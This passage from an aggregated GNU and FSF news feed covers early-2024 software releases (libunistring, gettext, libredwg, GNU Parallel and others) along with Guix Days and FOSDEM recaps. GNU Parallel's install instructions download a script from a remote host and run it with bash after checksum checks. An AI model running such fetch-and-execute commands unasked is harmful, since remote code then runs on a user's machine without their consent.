<li>New functions uc_is_property_prepended_concatenation_mark, uc_is_property_id_compat_math_start, uc_is_property_id_compat_math_continue, uc_is_property_ids_unary_operator and new constants UC_PROPERTY_PREPENDED_CONCATENATION_MARK, UC_PROPERTY_ID_COMPAT_MATH_START, UC_PROPERTY_ID_COMPAT_MATH_CONTINUE, UC_PROPERTY_IDS_UNARY_OPERATOR.
</li>
<li>New constant _libunistring_unicode_version.
</li>
<li>The UTF-8 decoder functions, especially u8_mbtouc, are now more Unicode Standard compliant.
</li>
<li>The *printf functions no longer support the %n directive, for security reasons.
</li>
<li>Fixed a bug in the *printf functions: In the %U, %lU, %llU directives, a negative width given as an argument did not trigger left-justification.
</li>
<li>The functions u16_strstr and u32_strstr now operate in worst-case linear time.
</li>
</ul>2024-02-24T16:38:25+00:00Bruno Haiblegettext @ Savannah: GNU gettext 0.22.5 released
https://savannah.gnu.org/news/?id=10597
<p>Download from <a href="https://ftp.gnu.org/pub/gnu/gettext/gettext-0.22.5.tar.gz">https://ftp.gnu.org/pub/gnu/gettext/gettext-0.22.5.tar.gz</a>
<br />
<br />
This is a bug-fix release.
<br />
<br />
New in this release:
<br />
<br />
</p>
<ul>
<li>The replacements for the printf()/fprintf()/... functions that are provided through <libintl.h> on native Windows and NetBSD now enable GCC's format string analysis (-Wformat).
</li>
</ul>
<p>
<br />
</p>
<ul>
<li>Bug fixes:
<ul>
<li>xgettext's processing of Vala files with printf method invocations has been corrected (regression in 0.22).
</li>
<li>Build fixes on macOS.
</li>
</ul>
</li>
</ul>2024-02-22T01:38:18+00:00Bruno HaibleFSF Events: Free Software Directory meeting on IRC: Friday, February 16, starting at 12:00 EST (17:00 UTC)
http://www.fsf.org/events/fsd-20240216-irc
Join the FSF and friends on Friday, February 16, from 12:00 to 15:00 EST (17:00 to 20:00 UTC) to help improve the Free Software Directory.2024-02-12T20:14:39+00:00FSF Eventslibredwg @ Savannah: libredwg-0.13.2 released
https://savannah.gnu.org/news/?id=10594
<p>A minor bugfix release, fixes error: cannot find input file: `test/xmlsuite/Makefile.in'
<br />
<br />
See <a href="https://www.gnu.org/software/libredwg/">https://www.gnu.org/software/libredwg/</a> and <a href="https://git.savannah.gnu.org/cgit/libredwg.git/tree/NEWS?h=0.13.2">https://git.savannah.gnu.org/cgit/libredwg.git/tree/NEWS?h=0.13.2</a>
<br />
<br />
Here are the compressed sources:
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.2.tar.gz">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.2.tar.gz</a> (20.1MB)
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.2.tar.xz">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.2.tar.xz</a> (10.1MB)
<br />
<br />
Here are the GPG detached signatures[*]:
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.2.tar.gz.sig">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.2.tar.gz.sig</a>
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.2.tar.xz.sig">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.2.tar.xz.sig</a>
<br />
<br />
Use a mirror for higher download bandwidth:
<br />
<a href="https://www.gnu.org/order/ftp.html">https://www.gnu.org/order/ftp.html</a>
<br />
<br />
Here are more binaries:
<br />
<a href="https://github.com/LibreDWG/libredwg/releases/tag/0.13.2">https://github.com/LibreDWG/libredwg/releases/tag/0.13.2</a>
<br />
<br />
Here are the SHA256 checksums:
<br />
<br />
7c517bc58267fb97ae063568969b16b248b74cb0bfe4a8232eec4f751d9468ff libredwg-0.13.2.tar.gz
<br />
9ab76010a6536ebf86df50f4973cb6cb2fc8aa2677084b8d22ac8320052d9329 libredwg-0.13.2.tar.xz
<br />
<br />
[*] Use a .sig file to verify that the corresponding file (without the
<br />
.sig suffix) is intact. First, be sure to download both the .sig file
<br />
and the corresponding tarball. Then, run a command like this:
<br />
<br />
gpg --verify libredwg-0.13.2.tar.gz.sig
<br />
<br />
If that command fails because you don't have the required public key,
<br />
then run this command to import it:
<br />
<br />
gpg --recv-keys B4F63339E65D6414
<br />
<br />
and rerun the gpg --verify command.<br />
</p>2024-02-10T18:13:26+00:00Reini UrbanGNU Guix: Guix Days 2024 and FOSDEM recap
https://guix.gnu.org/blog/2024/guix-days-2024-recap//
<p>Guix contributors and users got together in Brussels to explore Guix's status, chat about new ideas and spend some time together enjoying Belgian beer! Here's a recap of what was discussed.</p><h1>Day 1</h1><p>The first day kicked off with an update on the project's health, given by Efraim Flashner representing the project's Maintainer collective. Efraim relayed that the project is doing well, with lots of exciting new features coming into the archive and new users taking part. It was really cool listening to all the new capabilities - thank-you to all our volunteer contributors who are making Guix better! Efraim noted that the introduction of <a href="https://guix.gnu.org/manual/en/html_node/Teams.html">Teams</a> has improved collaboration - equally, that there's plenty of areas we can improve. For example, concern remains over the "bus factor" in key areas like infrastructure. There's also a desire to release more often as this provides an updated installer and lets us talk about new capabilities.</p><p>Christopher Baines gave a general talk about the QA infrastructure and the ongoing work to develop automated builds. Chris showed a diagram of the way the <a href="https://qa.guix.gnu.org/README#org5dde7a9">services interact</a> which shows how complex it is. Increasing automation is very valuable for users and contributors, as it removes tedious and unpleasant drudgery!</p><p>Then, Julien Lepiller, representing the <a href="https://foundation.guix.info/">Guix Foundation</a>, told us about the work it does. Julien also brought some great stickers! The Guix Foundation is a non-profit association that can receive donations, host activities and support the Guix project. Did you know that it's simple and easy to join? Anyone can do so by simply <strong><a href="https://foundation.guix.info/statutes/membershipform.txt">filling in the form and paying the 10 Euro membership fee</a></strong>. Contact the Guix Foundation if you'd like to know more.</p><p>The rest of the day was taken up with small groups discussing topics:</p><ul><li><p><strong>Goblins, Hoot and Guix</strong>: Christine Lemmer-Webber gave an introduction to
the <a href="https://spritely.institute/">Spritely Institute's</a> mission to create
decentralized networks and community infrastructure that respects user freedom
and security. There was a lot of interesting discussion about how the
network capabilities could be used in Guix, for example enabling distributed
build infrastructure.</p></li><li><p><strong>Infrastructure</strong>: There was a working session on how the projects
infrastructure works and can be improved. Christopher Baines has been
putting lots of effort into the QA and build infrastructure.</p></li><li><p><strong>Guix Home</strong>: Gábor Boskovits coordinated a session on Guix Home. It was
exciting to think about how Guix Home introduces the "Guix way" in a
completely different way from packages. This could introduce a whole new
audience to the project. There was interest in improving the overall
experience so it can be used with other distributions
(e.g. Fedora, Arch Linux, Debian and Ubuntu).</p></li><li><p><strong>Release management</strong>: Julien Lepiller led us through a discussion of
release management, explaining the ways that all the parts fit together. The
most important part that has to be done is testing the installation image
which is a manual process.</p></li></ul><h1>Day 2</h1><p>The second day's sessions:</p><ul><li><p><strong>Funding</strong>: A big group discussed funding for the project. Funding is
important because it determines many aspects of what the group can achieve.
Guix is a global project so there are pools of money in the United States and
Europe (France). Andreas Enge and Julien Lepiller represented the group that
handle finance, giving answers on the practical elements. Listening to their
description of this difficult and involved work, I was struck how grateful
we all are that they're willing to do it!</p></li><li><p><strong>Governance</strong>: Guix is a living project that continues to grow and evolve.
The governance discussion concerned how the project continues to chart a
clear direction, make good decisions and bring both current and new users on
the journey. There was reflection on the need for accountability and quick
decision making, without onerous bureaurcacy, while also acknowledging that
everyone is a volunteer. There was a lot of interest in how groups can join
together, perhaps using approaches like <a href="https://en.wikipedia.org/wiki/Sociocracy">Sociocracy</a>.</p><p>Simon Tournier has been working on an <a href="https://issues.guix.gnu.org/issue/66844">RFC process</a>,
which the project will use to discuss major changes and make decisions.
Further discussion is taking place on the development mailing-list if you'd
like to take part.</p></li><li><p><strong>Alternative Architectures</strong>: The Guix team continues to work on
alternative architectures. Efraim had his 32-bit PowerPC (Powerbook G4) with
him, and there's continued work on PowerPC64, ARM64 and RISC-V 64. The big
goal is a complete source bootscrap across all architectures.</p></li><li><p><strong>Hurd</strong>: Janneke Nieuwenhuizen led a discussion around
<a href="https://www.gnu.org/software/hurd/">GNU Hurd</a>, which is a microkernel-based
architecture. Activity has increased in the last couple of years, and there's
support for SMP and 64-bit (x86) is work in progress. There's lots of ideas
and excitement about getting Guix to work on Hurd.</p></li><li><p><strong>Guix CLI improvements</strong>: Jonathan coordinated a discussion about the state of the Guix CLI. A consistent, self-explaining and intuitive experience is important for our users. There are 39 top-level commands, that cover all the functionality from package management through to environment and system creation! Various improvements were discussed, such as making extensions available and improving documentation about the REPL work-flow.</p></li></ul><h1>FOSDEM 2024 videos</h1><p>Guix Days 2024 took place just before FOSDEM 2024. FOSDEM was a fantastic two days of interesting talks and conversations. If you'd like to watch the GUIX-related talks the videos are being put online:</p><ul><li><p><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2651-making-reproducible-and-publishable-large-scale-hpc-experiments/"><strong>Making reproducible and publishable large-scale HPC experiments</strong></a>
by Philippe Swartvagher.</p></li><li><p><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2339-scheme-in-the-browser-with-guile-hoot-and-webassembly/"><strong>Scheme in the Browser with Guile Hoot and WebAssembly</strong></a>
by Robin Templeton.</p></li><li><p><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-1755-risc-v-bootstrapping-in-guix-and-live-bootstrap/"><strong>RISC-V Bootstrapping in Guix and Live-Bootstrap</strong></a>
by Ekaitz Zarraga.</p></li><li><p><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2560-self-hosting-and-autonomy-using-guix-forge/"><strong>Self-hosting and autonomy using guix-forge</strong></a>
by Arun Isaac.</p></li><li><p><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2331-spritely-guile-guix-a-unified-vision-for-user-security/"><strong>Spritely, Guile, Guix: a unified vision for user security</strong></a>
by Christine Lemmer-Webber.</p></li><li><p><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2927-supporting-architecture-psabis-with-gnu-guix/"><strong>Supporting architecture psABIs with GNU Guix</strong></a>
by Efraim Flashner.</p></li></ul><h1>Join Us</h1><p>There's lots happening in Guix and many ways to get involved. We're a small and friendly project that values user freedom and a welcoming community. If this recap has inspired your interest, take a look at the <a href="https://git.savannah.gnu.org/cgit/guix/maintenance.git/tree/doc/guix-days-2024">raw notes</a> and <a href="https://guix.gnu.org/en/contribute/"><strong>join us!</strong></a></p>2024-02-10T18:00:00+00:00Steve Georgelibredwg @ Savannah: libredwg-0.13.1 bugfix release
https://savannah.gnu.org/news/?id=10593
<p>A minor bugfix release, but broken.
<br />
error: cannot find input file: `test/xmlsuite/Makefile.in'
<br />
You can safely patch the test/xmlsuite error away.
<br />
<br />
See <a href="https://www.gnu.org/software/libredwg/">https://www.gnu.org/software/libredwg/</a> and <a href="https://git.savannah.gnu.org/cgit/libredwg.git/tree/NEWS?h=0.13.1">https://git.savannah.gnu.org/cgit/libredwg.git/tree/NEWS?h=0.13.1</a>
<br />
<br />
Here are the compressed sources:
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.1.tar.gz">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.1.tar.gz</a> (17.4MB)
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.1.tar.xz">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.1.tar.xz</a> (9MB)
<br />
<br />
Here are the GPG detached signatures[*]:
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.1.tar.gz.sig">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.1.tar.gz.sig</a>
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.1.tar.xz.sig">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.1.tar.xz.sig</a>
<br />
<br />
Use a mirror for higher download bandwidth:
<br />
<a href="https://www.gnu.org/order/ftp.html">https://www.gnu.org/order/ftp.html</a>
<br />
<br />
Here are more binaries:
<br />
<a href="https://github.com/LibreDWG/libredwg/releases/tag/0.13.1">https://github.com/LibreDWG/libredwg/releases/tag/0.13.1</a>
<br />
<br />
Here are the SHA256 checksums:
<br />
<br />
4f0a8920a0d500c5df02ea4cddad0665397642ed39852bc401580a253ac5b911 libredwg-0.13.1.tar.gz
<br />
33bca643ec730143d252f6ddd2bb1d69062416f3a94b05b9e90eb8ccdbe149a4 libredwg-0.13.1.tar.xz
<br />
34fa0603fc8a0c4d9550096420a807457a3be34f99042568f2264f426e922f9c libredwg-0.13.1-win32.zip
<br />
89d67be07fd08a88adfe1870587ffa3fe8a121eebb915c92d01b7ab95bc4e572 libredwg-0.13.1-win64.zip
<br />
<br />
[*] Use a .sig file to verify that the corresponding file (without the
<br />
.sig suffix) is intact. First, be sure to download both the .sig file
<br />
and the corresponding tarball. Then, run a command like this:
<br />
<br />
gpg --verify libredwg-0.13.1.tar.gz.sig
<br />
<br />
If that command fails because you don't have the required public key,
<br />
then run this command to import it:
<br />
<br />
gpg --recv-keys B4F63339E65D6414
<br />
<br />
and rerun the gpg --verify command.<br />
</p>2024-02-10T08:42:52+00:00Reini Urbanlightning @ Savannah: GNU lightning 2.2.3 released!
https://savannah.gnu.org/news/?id=10591
<p>GNU lightning is a library to aid in making portable programs
<br />
that compile assembly code at run time.
<br />
<br />
Development:
<br />
<a href="http://git.savannah.gnu.org/cgit/lightning.git">http://git.savannah.gnu.org/cgit/lightning.git</a>
<br />
<br />
Download release:
<br />
<a href="ftp://ftp.gnu.org/gnu/lightning/lightning-2.2.3.tar.gz">ftp://ftp.gnu.org/gnu/lightning/lightning-2.2.3.tar.gz</a>
<br />
<br />
GNU Lightning 2.2.3 main new features:
<br />
<br />
</p>
<ul>
<li>PowerPC port now optimize for a variable stack frame size and only create a stack frame if a non leaf function.
</li>
<li>New callee test to ensure register values saved on the stack are not corrupted when calling a jit or C function. While no problem was found in any port, the new test was added to make sure there were no failures.
</li>
<li>Add back the jit_hmul interface, from Lightning 1.x. There are special cases where it is desirable to only know the high part of a multiplication.
</li>
<li>Correct wrong implementation of zero right shift with two registers output.
</li>
<li>Add new pre and post increment for load and store instructions.
</li>
<li>Several minor bug fixes.
</li>
</ul>2024-02-08T18:51:36+00:00Paulo César Pereira de Andradelibredwg @ Savannah: libredwg-0.13 released
https://savannah.gnu.org/news/?id=10590
<p>Can now also read and write all DWG formats pre-R13.
<br />
See <a href="https://www.gnu.org/software/libredwg/">https://www.gnu.org/software/libredwg/</a> and <a href="https://github.com/LibreDWG/libredwg/blob/0.13/NEWS">https://github.com/LibreDWG/libredwg/blob/0.13/NEWS</a>
<br />
Now we'll finish work on encode support for r2004+.
<br />
<br />
Here are the compressed but broken sources:
<br />
error: cannot find input file: `test/xmlsuite/Makefile.in'
<br />
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.tar.gz">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.tar.gz</a> (17.4MB)
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.tar.xz">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.tar.xz</a> (9MB)
<br />
<br />
Here are the GPG detached signatures[*]:
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.tar.gz.sig">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.tar.gz.sig</a>
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.tar.xz.sig">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.tar.xz.sig</a>
<br />
<br />
Use a mirror for higher download bandwidth:
<br />
<a href="https://www.gnu.org/order/ftp.html">https://www.gnu.org/order/ftp.html</a>
<br />
<br />
You can safely patch the test/xmlsuite error away.
<br />
<br />
Here are more binaries:
<br />
<a href="https://github.com/LibreDWG/libredwg/releases/tag/0.13">https://github.com/LibreDWG/libredwg/releases/tag/0.13</a>
<br />
<br />
Here are the SHA256 checksums:
<br />
<br />
9682b0c5e6d91720666118059c67bf614e407a49b1a3c13312fe6a6c8f41d9cf libredwg-0.13.tar.gz
<br />
dd906f59d71b26c13fd2420f50fc50bea666fd54acc764d8c344f7f89d5ab94e libredwg-0.13.tar.xz
<br />
cc5df6456cdc7d0c9ebcd2eb798b81a80aab6b3a8f5417d4598262f3d2120886 libredwg-0.13-win32.zip
<br />
34774d2cd1c87f00a1d647f6c172ff92d02bab4ebe586badd883772fb746218b libredwg-0.13-win64.zip
<br />
<br />
<br />
[*] Use a .sig file to verify that the coresponding file (without the
<br />
.sig suffix) is intact. First, be sure to download both the .sig file
<br />
and the corresponding tarball. Then, run a command like this:
<br />
<br />
gpg --verify libredwg-0.13.tar.gz.sig
<br />
<br />
If that command fails because you don't have the required public key,
<br />
then run this command to import it:
<br />
<br />
gpg --recv-keys B4F63339E65D6414
<br />
<br />
and rerun the gpg --verify command.<br />
</p>2024-02-04T09:53:49+00:00Reini Urbangnuastro @ Savannah: Gnuastro 0.22 released
https://savannah.gnu.org/news/?id=10589
<p>The 22st release of GNU Astronomy Utilities (Gnuastro) is now available. See the full announcement for all the new features in this release and the many bugs that have been found and fixed: <a href="https://lists.gnu.org/archive/html/info-gnuastro/2024-02/msg00000.html">https://lists.gnu.org/archive/html/info-gnuastro/2024-02/msg00000.html</a><br />
</p>2024-02-03T23:19:01+00:00Mohammad AkhlaghiGNU Taler news: GNU libmicrohttpd 1.0 released
https://taler.net/en/news/2024-04.html
<article>
We are glad to announce the release of GNU libmicrohttpd v1.0, and future plans for the library.
</article>2024-01-31T23:00:00+00:00GNU Taler newsGNU Taler news: NLnet open call with funding opportunities for GNU Taler integrators
https://taler.net/en/news/2024-03.html
<article>
Join us on our journey towards informational self-determination in payments! As part of NGI TALER, NLnet Foundation is running an open call and will award grants to third parties working on GNU Taler enhancements globally. The application process is simple and the first submission deadline is April 1st 2024.
</article>2024-01-31T23:00:00+00:00GNU Taler newsfreeipmi @ Savannah: FreeIPMI 1.6.12 & 1.6.13 Released
https://savannah.gnu.org/news/?id=10585
<p>FreeIPMI 1.6.12 - 11/19/23
<br />
--------------------------
<br />
o Use poll() over select() to avoid fd limit in openipmi driver.
<br />
o Fix potential portability problems on systems without cbrt().
<br />
o Minor documentation updates.
<br />
<br />
FreeIPMI 1.6.13 - 01/26/24
<br />
--------------------------
<br />
o Fix build issues on systems where inb/outb are declared with
<br />
inline assembly.
<br />
o Add additional sensor/event interpretations.<br />
</p>2024-01-27T00:59:45+00:00Albert Chuparallel @ Savannah: GNU Parallel 20240122 ('Frederik X') released
https://savannah.gnu.org/news/?id=10584
<p>GNU Parallel 20240122 ('Frederik X') has been released. It is available for download at: lbry://@GnuParallel:4
<br />
<br />
Quote of the month:
<br />
<br />
GNU Parallel alone provides more value than moreutils
<br />
-- <a href="mailto:Ferret7446@news.ycombinator.com">Ferret7446@news.ycombinator.com</a>
<br />
<br />
New in this release:
<br />
</p>
<ul>
<li>--sshlogin supports ranges: server[01-12,15] 10.0.[1-10].[2-254]
</li>
<li>--plus enables {slot-1} and {seq-1} = {%}-1 and {#}-1 to count from 0.
</li>
<li>env_parallel.{sh,ash,dash,bash,ksh,zsh} are now the same script.
</li>
<li>Bug fixes and man page updates.
</li>
</ul>
<p>
<br />
GNU Parallel - For people who live life in the parallel lane.
<br />
<br />
If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.
<br />
<br />
</p>
<h2>About GNU Parallel</h2>
<p>
<br />
GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.
<br />
<br />
If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.
<br />
<br />
GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.
<br />
<br />
For example you can run this to convert all jpeg files into png and gif files and have a progress bar:
<br />
<br />
parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif
<br />
<br />
Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:
<br />
<br />
find . -name '*.jpg' |
<br />
parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200
<br />
<br />
You can find more about GNU Parallel at: <a href="http://www.gnu.org/s/parallel/">http://www.gnu.org/s/parallel/</a>
<br />
<br />
You can install GNU Parallel in just 10 seconds with:
<br />
<br />
$ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
<br />
fetch -o - <a href="http://pi.dk/3">http://pi.dk/3</a> ) > install.sh
<br />
$ sha1sum install.sh | grep 883c667e01eed62f975ad28b6d50e22a
<br />
12345678 883c667e 01eed62f 975ad28b 6d50e22a
<br />
$ md5sum install.sh | grep cc21b4c943fd03e93ae1ae49e28573c0
<br />
cc21b4c9 43fd03e9 3ae1ae49 e28573c0
<br />
$ sha512sum install.sh | grep ec113b49a54e705f86d51e784ebced224fdff3f52
<br />
79945d9d 250b42a4 2067bb00 99da012e c113b49a 54e705f8 6d51e784 ebced224
<br />
fdff3f52 ca588d64 e75f6033 61bd543f d631f592 2f87ceb2 ab034149 6df84a35
<br />
$ bash install.sh
<br />
<br />
Watch the intro video on <a href="http://www.youtube.com/playlist?list=PL284C9FF2488BC6D1">http://www.youtube.com/playlist?list=PL284C9FF2488BC6D1</a>
<br />
<br />
Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.
<br />
<br />
When using programs that use GNU Parallel to process data for publication please cite:
<br />
<br />
O. Tange (2018): GNU Parallel 2018, March 2018, <a href="https://doi.org/10.5281/zenodo.1146014">https://doi.org/10.5281/zenodo.1146014</a>.
<br />
<br />
If you like GNU Parallel:
<br />
</p>
<ul>
<li>Give a demo at your local user group/team/colleagues
</li>
<li>Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists
</li>
<li>Get the merchandise <a href="https://gnuparallel.threadless.com/designs/gnu-parallel">https://gnuparallel.threadless.com/designs/gnu-parallel</a>
</li>
<li>Request or write a review for your favourite blog or magazine
</li>
<li>Request or build a package for your favourite distribution (if it is not already there)
</li>
<li>Invite me for your next conference
</li>
</ul>
<p>
<br />
If you use programs that use GNU Parallel for research:
<br />
<br />
</p>
<ul>
<li>Please cite GNU Parallel in you publications (use --citation)
</li>
</ul>
<p>
<br />
If GNU Parallel saves you money:
<br />
<br />
</p>
<ul>
<li>(Have your company) donate to FSF <a href="https://my.fsf.org/donate/">https://my.fsf.org/donate/</a>
</li>
</ul>
<p>
<br />
</p>
<h2>About GNU SQL</h2>
<p>
<br />
GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.
<br />
<br />
The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.
<br />
<br />
When using GNU SQL for a publication please cite:
<br />
<br />
O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.
<br />
<br />
</p>
<h2>About GNU Niceload</h2>
<p>
<br />
GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.<br />
</p>2024-01-24T03:19:35+00:00Ole TangeFSF News: Hayley Tsukayama will speak about grassroots activism at LibrePlanet 2024
http://www.fsf.org/news/hayley-tsukayama-will-speak-about-grassroots-activism-at-libreplanet-2024
2024-01-23T17:53:45+00:00FSF NewsFSF Events: Free Software Directory meeting on IRC: Friday, January 26, starting at 12:00 EST (17:00 UTC)
http://www.fsf.org/events/copy_of_fsd-20240126-irc
Join the FSF and friends on Friday, January 26, from 12:00
to 15:00 EST (17:00 to 20:00 UTC)
to help improve the Free Software Directory.2024-01-22T18:43:32+00:00FSF Eventsgprofng-gui @ Savannah: gprofng GUI 1.1 released
https://savannah.gnu.org/news/?id=10583
<p>gprofng GUI is a full-fledged graphical interface for the gprofng profiler, which is part of the GNU binutils.
<br />
<br />
The tarball gprofng-gui-1.1.tar.gz is now available at <a href="https://ftp.gnu.org/gnu/gprofng-gui/gprofng-gui-1.1.tar.gz">https://ftp.gnu.org/gnu/gprofng-gui/gprofng-gui-1.1.tar.gz</a>.
<br />
<br />
--
<br />
Vladimir Mezentsev
<br />
Jose E. Marchesi
<br />
22 January 2024<br />
</p>2024-01-22T18:08:24+00:00Jose E. MarchesiGNU Guix: Guix at FOSDEM 2024
https://guix.gnu.org/blog/2024/meet-guix-at-fosdem-2024//
<p>It's not long to FOSDEM 2024, where Guixers will come together to learn and hack.
As usual there's some great talks and opportunities to meet other users and
contributors.</p><p><a href="https://fosdem.org/2024/">FOSDEM</a> is Europe's biggest Free Software conference.
It's aimed at developers and anyone who's interested in the Free Software
movement. While it's an in-person conference there are live video streams
and lots of ways to participate remotely.</p><p>The schedule is varied with development rooms covering many interests. Here
are some of the talks that are of particular interest to Guixers:</p><h3>Saturday, 3rd Febuary</h3><ul><li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2651-making-reproducible-and-publishable-large-scale-hpc-experiments/">"<strong>Making reproducible and publishable large-scale HPC experiments</strong>"</a>
by Philippe Swartvagher (10:30 CET). Philippe will talk about the search for
reproducible experiments in high-performance computing (HPC) and how he uses
Guix in his methododology.</li></ul><h3>Sunday, 4th February</h3><p>The <a href="https://fosdem.org/2024/schedule/track/declarative-and-minimalistic-computing/">Declarative and Minimalistic Computing track</a>
takes place Sunday morning. Important topics are:</p><ul><li><em>Minimalism Matters</em>: sustainable computing through smaller, resource efficient systems</li><li><em>Declarative Programming</em>: reliable and reproducible systems by minimising side-effects</li></ul><p>Guix-related talks are:</p><ul><li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2339-scheme-in-the-browser-with-guile-hoot-and-webassembly/">"<strong>Scheme in the Browser with Guile Hoot and WebAssembly</strong>"</a>
by Robin Templeton (11:00 CET). A talk covering bringing Scheme to WebAssembly
through the Guile Hoot toolchain. Addressing the current state of Guile Hoot
with examples, and how recent Wasm proposals might improve the
situation in the future.</li><li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-1755-risc-v-bootstrapping-in-guix-and-live-bootstrap/">"<strong>RISC-V Bootstrapping in Guix and Live-Bootstrap</strong>"</a>
by Ekaitz Zarraga (11:20 CET). An update on the RISC-V bootstrapping effort
in Guix and Live-bootstrap. Covering what's been done, what's left to do and
some of the lessons learned.</li><li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2560-self-hosting-and-autonomy-using-guix-forge/">"<strong>Self-hosting and autonomy using guix-forge</strong>"</a>
by Arun Isaac (11:40 CET). This talk demonstrates the value of Guix's declarative
configuration to simplify deploying and maintaining complex services. Showing
<a href="https://guix-forge.systemreboot.net/">guix-forge</a>, a project that
makes it easy to self-host an efficient software forge.</li><li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2331-spritely-guile-guix-a-unified-vision-for-user-security/">"<strong>Spritely, Guile, Guix: a unified vision for user security</strong>"</a>
by Christine Lemmer-Webber (12:00 CET). Spritely's goal is to create
networked communities that puts people in control of their own identity
and security. This talk will present a unified vision of how Spritely,
Guile, and Guix can work together to bring user freedom and security to
everyone!</li></ul><p>This year the track commemorates Joe Armstrong, who was the principal
inventor of <a href="https://www.erlang.org/">Erlang</a>. His focus on concurrency,
distribution and fault-tolerence are key topics in declarative and minimalistic
computing. This <a href="https://thenewstack.io/why-erlang-joe-armstrongs-legacy-of-fault-tolerant-computing/">article</a>
is a great introduction to his legacy. Along with
<a href="https://youtu.be/lKXe3HUG2l4?si=3zbc7BEbg1o6mW5R">"<strong>The Mess We're In</strong>"</a>, a
classic where he discusses why software is getting worse with time, and what can
be done about it.</p><p>On Sunday afternoon, the <a href="https://fosdem.org/2024/schedule/track/distributions/">Distributions devroom</a>
has another Guix talk:</p><ul><li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2927-supporting-architecture-psabis-with-gnu-guix/">"<strong>Supporting architecture psABIs with GNU Guix</strong>"</a>
by Efraim Flashner (14:30 CET). Guix maintainer Efraim will be giving a
talk about improving Guix's performance. Demonstrating how to use psABI
targets that keep older hardware compatible while providing optimized
libraries for newer hardware.</li></ul><h3>Guix Days (Thursday and Friday)</h3><p>Guix Days will be taking place on the Thursday and Friday before FOSDEM. This is
an <a href="https://en.wikipedia.org/wiki/Unconference">"unconference-style"</a> event,
where the community gets together to focus on Guix's development. All the
details are on the
<a href="https://libreplanet.org/wiki/Group:Guix/FOSDEM2024"><strong>Libreplanet Guix Wiki</strong></a>.</p><h3>Participating</h3><p>Come and join in the fun, whether you're a new Guix user or seasoned hacker!
If you're not in Brussels you can still take part:</p><ul><li>See the <a href="https://fosdem.org/2024/schedule/">FOSDEM Schedule</a></li><li>Watch the <a href="https://fosdem.org/2024/schedule/streaming/">live streams</a></li><li>Chat in the unofficial <a href="https://matrix.to/#/#guix-days:matrix.org">Guix Days Matrix room</a></li></ul><h3>About GNU Guix</h3><p><a href="https://guix.gnu.org">GNU Guix</a> is a transactional package manager and
an advanced distribution of the GNU system that <a href="https://www.gnu.org/distros/free-system-distribution-guidelines.html">respects user
freedom</a>.
Guix can be used on top of any system running the Hurd or the Linux
kernel, or it can be used as a standalone operating system distribution
for i686, x86_64, ARMv7, AArch64, and POWER9 machines.</p><p>In addition to standard package management features, Guix supports
transactional upgrades and roll-backs, unprivileged package management,
per-user profiles, and garbage collection. When used as a standalone
